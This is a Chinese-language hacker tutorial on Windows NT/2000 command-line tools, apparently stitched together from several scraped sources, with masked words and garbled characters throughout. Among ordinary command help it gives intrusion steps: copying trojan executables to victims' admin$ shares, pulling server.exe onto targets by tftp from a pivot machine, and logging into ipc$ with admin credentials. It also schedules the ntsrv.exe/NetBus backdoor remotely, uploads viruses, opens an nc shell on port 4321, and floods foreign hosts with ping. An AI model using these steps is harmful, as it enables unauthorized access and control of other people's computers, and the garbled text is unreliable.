at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止

at id号 /delete 停止某个已注册的计划任务

at 查看所有的计划任务

at ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机

finger username @host 查看最近有哪些用户登陆

telnet ip 端口 远和登陆服务器,默认端口为23

open ip 连接到IP（属telnet登陆后的命令）

telnet 在本机上直接键入telnet 将进入本机的telnet

copy 路径文件名1　路径文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件

copy c:srv.exe ipadmin$ 复制本地c:srv.exe到对方的admin下

cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件

copy ipadmin$svv.exe c: 或:copyipadmin$*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C：

xcopy 要复制的文件或目录树　目标地址目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件

tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:server.exe 登陆后，将“IP”的server.exe下载到目标主机c:server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送

tftp -i 对方IP　put c:server.exe 登陆后，上传本地c:server.exe至主机

ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)

route print 显示出IP路由，将主要显示 *** 地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface

arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息

start 程序名或命令 /max 或/min 新开一个新窗口并更大化（最小化）运行某程序或命令

mem 查看cpu使用情况

attrib 文件名(目录名) 查看某文件（目录）的属性

attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性

dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间

date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间

set 指定环境变量名称=要指派给变量的字符 设置环境变量

set 显示当前所有的环境变量

set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量

pause 暂停批处理程序，并显示出：请按任意键继续....

if 在批处理程序中执行条件处理（更多说明见if命令及变量）

goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）

call 路径批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?）

for 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量）

echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置

echo 信息 在屏幕上显示出信息

echo 信息 pass.txt 将"信息"保存到pass.txt文件中

findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello

find 文件名 查找某文件

title 标题名字 更改CMD窗口标题名字

color 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白

prompt 名称 更改cmd.exe的显示的命令提示符(把C:、D:统一改为：EntSky )

三：

ver 在DOS窗口下显示版本信息

winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）

format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：format D: /FS:NTFS

md　目录名 创建目录

replace 源文件　要替换文件的目录 替换文件

ren 原文件名　新文件名 重命名文件名

tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称

type 文件名 显示文本文件的内容

more 文件名 逐屏显示输出文件

doskey 要锁定的命令＝字符

doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir=

taskmgr 调出任务管理器

chkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误

tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口

exit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe

path 路径可执行文件的文件名 为可执行文件设置一个路径。

cmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /?

regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示；

regedit /e 注册表文件名 导出注册表

cacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D: est.txt /D pub 设定d: est.txt拒绝pub用户访问。

cacls 文件名 查看文件的访问用户权限列表

REM 文本内容 在批处理文件中添加注解

netsh 查看或更改本地 *** 配置情况

四：

IIS服务命令：

iisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现）

iisreset /start或stop 启动（停止）所有Internet服务

iisreset /restart 停止然后重新启动所有Internet服务

iisreset /status 显示所有Internet服务状态

iisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动

iisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机

iisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务

iisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。

FTP 命令： (后面有详细说明内容)

ftp的命令行格式为:

ftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。

－d 使用调试方式。

－n 限制ftp的自动登录,即不使用.netrc文件。

－g 取消全局文件名。

help [命令] 或 ？[命令] 查看命令说明

bye 或 quit 终止主机FTP进程,并退出FTP管理方式.

pwd 列出当前远端主机目录

put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中

get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中

mget [remote-files] 从远端主机接收一批文件至本地主机

mput local-files 将本地主机中一批文件传送至远端主机

dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件

ascii 设定以ASCII方式传送文件(缺省值)

bin 或 image 设定以二进制方式传送文件

bell 每完成一次文件传送,报警提示

cdup 返回上一级目录

close 中断与远程服务器的ftp会话(与open对应)

open host[port] 建立指定ftp服务器连接,可指定连接端口

delete 删除远端主机中的文件

mdelete [remote-files] 删除一批文件

mkdir directory-name 在远端主机中建立目录

rename [from] [to] 改变远端主机中的文件名

rmdir directory-name 删除远端主机中的目录

status 显示当前FTP的状态

system 显示远端主机系统类型

user user-name [password] [account] 重新以别的用户名登录远端主机

open host [port] 重新建立一个新的连接

prompt 交互提示模式

macdef 定义宏命令

lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录

chmod 改变远端主机的文件权限

case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母

cd remote－dir 进入远程主机目录

cdup 进入远程主机目录的父目录

! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip

更佳吧

黑客CMD命令有哪些 黑客CMD Ping命令大全

黑客入门必须掌握8个DOS命令 ping 它是用来检查 *** 是否通畅或者 *** 连接速度的命令。作为一个生活在 *** 上的管理员或者黑客来说,ping命令是之一个必须掌握的

如何使用cmd外网攻击别人（黑客组织）ip？

首先需要说明一点的就是：作为一个真正的黑客是绝对不会那么容易练就出来的！如果自己下定决心想学习出色的黑客技术，你就必须要进入：“为编写各种计算机底层程序而如醉如痴；为学习计算机操作系统内部结构、计算机汇编语言编程、计算机 *** 原理和协议、扎实的各种数学基础等枯燥无味的知识而长期忍受寂寞”的状态！

只有这样，你才有可能成为一名真正的黑客！你才有可能自如地使用各种工具（包括使用 cmd 命令状态）攻击别人（包括黑客组织）的 IP 地址（通常是服务器的静态 IP 地址）。

当然了，最后要说的一句话就是：即使真的拥有了 HACKER的技术，也还是要做红客的事情，千万不要干那些令人所不齿的坏事情。记住：伸手必被捉！

cmd攻击别人电脑命令，

工欲善其事，必先利其器”——当然不是让你再满世界去找新的黑客软件啦(其实我不反对使用这些软件，相反我很喜欢用它们，但是必须是在知其所以然的情况下使用，才有可能对自身的电脑水平有所帮助)，要进行入侵工作的话，至少(我认为)得装上NT操作系统，以它作为入侵平台，因为NT本身对 *** 的支持可以说比WIN9X来得更强大得多……当然，如果想对UNIX系统动点小手术( *** 中的UNIX可始终还是主流呀)而又没钱装UNIX的话，LINUX也极佳的选择(特别是现在国内至少有七八种中文LINUX版本——想当年要给REDHAT配上中文支持是何等麻烦……)，至少你可以借此了解UNIX系统的基本操作以及文件存放位置、系统配置、编译器、各种动作之后的记录等等……

然后还得再学点编程语言，至少C与UNIX下的SHELL编程得会一点，能看懂人家写的利用各种漏洞的程序，能对它进行修改，偶尔还能写几个小程序放到网上让大伙儿乐乐，这样玩起来才可能有成就感(其实我自己还不太行，但这多少是个目标)

好了，废话少说，先讲讲一些MS系统里自带的相关 *** 程序的使用吧。

在MS的操作系统中，与 *** 安全较有关系的几个命令/程序是:ping\winipcfg\tracert\net\at\netstat,且待我慢慢道来:

1. ping:这是TCP/IP协议中最有用的命令之一

它给另一个系统发送一系列的数据包，该系统本身又发回一个响应，这条实用程序对查找远程主机很有用，它返回的结果表示是否能到达主机，宿主机发送一个返回数据包需要多长时间。

Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]

[-r count] [-s count] [[-j host-list] | [-k host-list]]

[-w timeout] destination-list

Options:

-t Ping the specifed host until interrupted.(除非人为中止，否则一直ping下去)

-a Resolve addresses to hostnames.(把IP转为主机名)

-n count Number of echo requests to send.(响应请求的数量)

-l size Send buffer size.(封包的大小)

-f Set Don't Fragment flag in packet.(信息包中无碎片)

-i TTL Time To Live.(时间)

-v TOS Type Of Service.(服务类型)

-r count Record route for count hops.

-s count Timestamp for count hops.

-j host-list Loose source route along host-list.

-k host-list Strict source route along host-list.(较严格的……唉，怎么译好……算了，放着吧)

-w timeout Timeout in milliseconds to wait for each reply.(timeout的时间)

比如大家可能都知道的一个命令 # ping -f -s 65000 ***.***.***.***或者前阶段大家所谓ping死霉国佬时所用的命令(当然这样只会造成我方自己的 *** 阻塞)。

其实这个命令主要是用来看对方应答的速度，如果怎么ping 得到的结果都是request time out。那恐怕你根本就不用你去找这台主机了，它不在你的射程之内。

2. winipcfg:

这是用来看自己IP位址的小工具，win98自带，NT里则 *** 监视器里就能看到IP了，还有个小实用程序叫……好象是叫IPCONFIG吧，没怎么用，都快忘了……这种东东网上其实相当之多，但既然“自带”，又何须外求，何况网上下载的黑客的东东里有没有特洛伊犹未可知，再说了，如果你不是在自己的“爱姬”上运行，岂不是就没法干活?——哈，不好意思，跑题了，但——接着跑两句:可以把一些常用的、经典的工具上传到网上，当作一个备份，什么时候在网吧、某家公司要干活的话，直接下载就是一个完整无缺的工具包了。

这个东东相当简单，直接在DOS下键入命令就是了，没有什么参数。

3. tracert:是验证通往远程主机路径的实用程序

用法: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name

参数:

-d Do not resolve addresses to hostnames.(不将IP转为主机名)

-h maximum_hops Maximum number of hops to search for target.(更大跟踪数量)

-j host-list Loose source route along host-list.

-w timeout Wait timeout milliseconds for each reply.(time out 的时间)

最简单的用法就是 tracert hostname 其中hostname是计算机名或你想跟踪其路径的计算机的IP地址。TRACERT将返回数据包借以到达最终目的地的各种IP地址，你知道该怎么利用它吗?

我略为解释一下吧:跟踪通往210.142.192.130的路由，更大30:

之一行:*^%* 我就是从这里出去的(呵，真不想说^^)

第四行:是不是快要出国了呢?

第九行:呀!这是日本鬼子的地盘……

4. net:这可是个非常棒的东西，如果不会用的话，赶紧睁大眼睛噢

这个命令的语法是: 可用的命令包括:

NET ACCOUNTS NET HELP NET SHARE

NET COMPUTER NET HELPMSG NET START

NET CONFIG NET LOCALGROUP NET STATISTICS

NET CONFIG SERVER NET NAME NET STOP

NET CONFIG WORKSTATION NET PAUSE NET TIME

NET CONTINUE NET PRINT NET USE

NET FILE NET SEND NET USER

NET GROUP NET SESSION NET VIEW

NET HELP SERVICES 列出用户可以启动的 *** 服务。

NET HELP SYNTAX 解释如何阅读 NET HELP 语法行。

NET HELP command | MORE 用于逐屏显示帮助。

我可就不逐样解释了——这样会把我的手指累坏，就说说常用的两个命令吧

a.net view

这个命令的语法是:

NET VIEW [\\computername | /DOMAIN[:domainname]]

NET VIEW /NETWORK:NW [\\computername]

NET VIEW 用于显示一个计算机上共享资源的列表。当不带选项使用本命令时，它就会显示当前域或 *** 上的计算机上的列表。

\\computername 指用户希望浏览其共享资源的计算机。

/DOMAIN:domainname 指定用户希望浏览有效的计算机所在的域。如果省略了域名，就会显示局域 *** 上的所有域。

/NETWORK:NW 显示 NetWare *** 上所有可用的服务器。如果指定了一个计算机名，就会显示NetWare *** 中那个计算机上的可用资源。

至于举例嘛，比如你知道一个远程计算机***.***.**.***上有开资源共享，那么运行net view \\***.***.**.*** 就可以了

b.net use

这个命令的语法是:NET USE [devicename | *] [\\computername\sharename[\volume] [password | *]]

[/USER:[domainname\]username]

[[/DELETE] | [/PERSISTENT:{YES | NO}]]

NET USE [devicename | *] [password | *]] [/HOME]

NET USE [/PERSISTENT:{YES | NO}]

NET USE 用于将计算机与共享的资源相连接，或者切断计算机与共享资源的连接。当不带选项使用本命令时，它会列出计算机的连接。

devicename 指定一个名字以便与资源相连接，或者指定要切断的设备。有两种类型的设备名:磁盘驱动器 (D: 至 Z:) 和打印机 (LPT1: 至 LPT3:)。输入一个星号来代替一个指定的设备名可以分配下一个可用设备名。

\\computername 指控制共享资源的计算机的名字。如果计算机名中包含有空字符，就要将双反斜线 (\\) 和计算机名一起用引号 (" ")括起来。计算机名可以有1 到15 个字符。

\sharename 指共享资源的 *** 名字。

\volume 指定一个服务器上的 NetWare 卷。用户必须安装 Netware 的客户服务(Windows NT 工作站) 或者 Netware 的网关服务 (Windows NT 服务器) 并使之与NetWare 服务器相连。

password 指访问共享资源所需要的密码。

* 进行密码提示。当在密码提示符下输入密码时，密码是不会显示的。

/USER 指定连接时的一个不同的用户名。

domainname 指定另外一个域。如果缺省域，就会使用当前登录的域。

username 指定登录的用户名。

/HOME 将用户与他们的宿主目录相连。

/DELETE 取消一个 *** 连接，并且从永久连接列表中删除该连接。

/PERSISTENT 控制对永久 *** 连接的使用。其缺省值是最近使用的设置。

YES 在连接产生时保存它们，并在下次登录时恢复它们。

NO 不保存正在产生的连接或后续的连接;现有的连接将在下次登录时被恢复。可以使用 /DELETE 选项开关来删除永久连接。

PS:前两天在绿色兵团的贴子里见到一位仁兄的话，与这个命令有异曲共工之妙，也说明一个大概:

在浏览器中输入 file:///\\***.***.**.***\c

则网上共享的C盘内容就会显示出来了，就仿佛用浏览器上FTP站点看到的一样。各位不妨试试，还可试试举一反三……

5.at: 排定在特定的日期和时间运行某些命令和程序。

运行 AT 命令之前必须先启动 Schedule 服务。瞧，现炒就得现卖，刚学了net命令，但这个start命令我可没详述，自已看看帮助文件，摸索一下各种命令的用法吧。

C:\net start schedule

Schedule 正在启动服务.....

Schedulw 服务启动成功。

AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]

AT [\\computername] time [/INTERACTIVE]

[ /EVERY:date[,...] | /NEXT:date[,...]] "command"

\\computername 指定远程计算机。如果省略这个参数命令会被排定在本机上运行。

id 指定给排定进度命令的识别号。

/delete 删除某个已排定进度的命令。如果省略标识，计算机上所有已排定进度的命令都会被删除。

/yes 用于删除所有作业，且不想在运行删除时显示确认信息 。

time 指定命令运行的时间。

interactive 允许作业在运行时，与用户通过桌面交互。

/every:date[,...] 指定在每周或每月的某日 (或某几日) 运行命令。

如果省略日期，则默认为在每月的本日运行。

/next:date[,...] 指定在下一个指定日期 (如，下周三)，运行命令。

如果省略日期，则默认为在每月的本日运行。

"command" 准备运行的 Windows NT 命令或批处理文件。

知道了如何使用AT，再来看看如何在远程NT上运行ntsrv.exe:

1 利用管理员登陆到目的服务器， *** 为: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"

2 利用ntsrv.exe启动远程: netsvc \\x.x.x.x schedule /start

3 利用AT.EXE在远程服务器设置程序定时运行，当然最快运行最理想，所以，你可以用letmein.exe得到服务器的时间，然后:

at \\x.x.x.x 00:00 ntsrv.exe /port:64321

其中00:00要改为用letmein.exe得回来的具体时间+一点容量，等一会后，再在本地启动netbus.exe，键入目的服务器得ip地址或hostname，连接!比如之一种 *** ，你想要在目的服务器运行诸如病毒之类的东东，可以利用netbus得上传功能，将各种“大补丸”上传至目的服务器，再用netbus的"Start program"，键入完整路径，就ok了!第二种 *** 是利用netbus的“App redirect”功能，启动远程telnet服务，如下:在netbus中击“App redirect”，键入"C:\winnt\system32\cmd.exe"，Port为:4321，服务就启动了，然后在本地运行:nc x.x.x.x 4321，出现dos启动的画面就表示连接成功:

Microsoft(R) Windows NT(TM)

(C) Copyright 1985-1996 Microsoft Corp.

C:\

注:这里有一小段是抄KILLUSA的文章——别找我要稿费啊^^

4.netstat 这是一个观察 *** 连接状态的实用工具。

它能检验IP的当前连接状态，在断定你的基本级通信正在进行后，就要验证系统上的服务。这个服务包括检查正在收听输入的通信量和/或验证你正在创建一个与远程站点的会话，它可以很轻松地做到这一点。网上也可以看到很多如X-netstat之类的工具，是WIN界面的，更加直观而已，并没有多什么功能，这个命令的具体用法如下:

Displays protocol statistics and current TCP/IP network connections.(显示协议与当前 *** 连接)

NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

-a Displays all connections and listening ports.(显示所有连接和监听端口)

-e Displays Ethernet statistics. This may be combined with the -s

option.(显示以太连接，可以与-s连用)

-n Displays addresses and port numbers in numerical form.(显示地址和端口)

-p proto Shows connections for the protocol specified by proto; proto

may be TCP or UDP. If used with the -s option to display

per-protocol statistics, proto may be TCP, UDP, or IP.

-r Displays the routing table.

-s Displays per-protocol statistics. By default, statistics are

shown for TCP, UDP and IP; the -p option may be used to specify

a subset of the default.

interval Redisplays selected statistics, pausing interval seconds

between each display. Press CTRL+C to stop redisplaying

statistics. If omitted, netstat will print the current

configuration information once.(interval是设定一个刷新时间，在间隔时间内暂停，按CTRL+C停止……)

这是我在本机未连接 *** 时运行的，之一列为协议，第二列为本地地址，第三列是与你进行连接的主机或用户的IP位址(IP后冒号之后的数字是端口号)，最后一列是状态。这个命令以-n和-a的参数我较常使用，读者可以参考使用。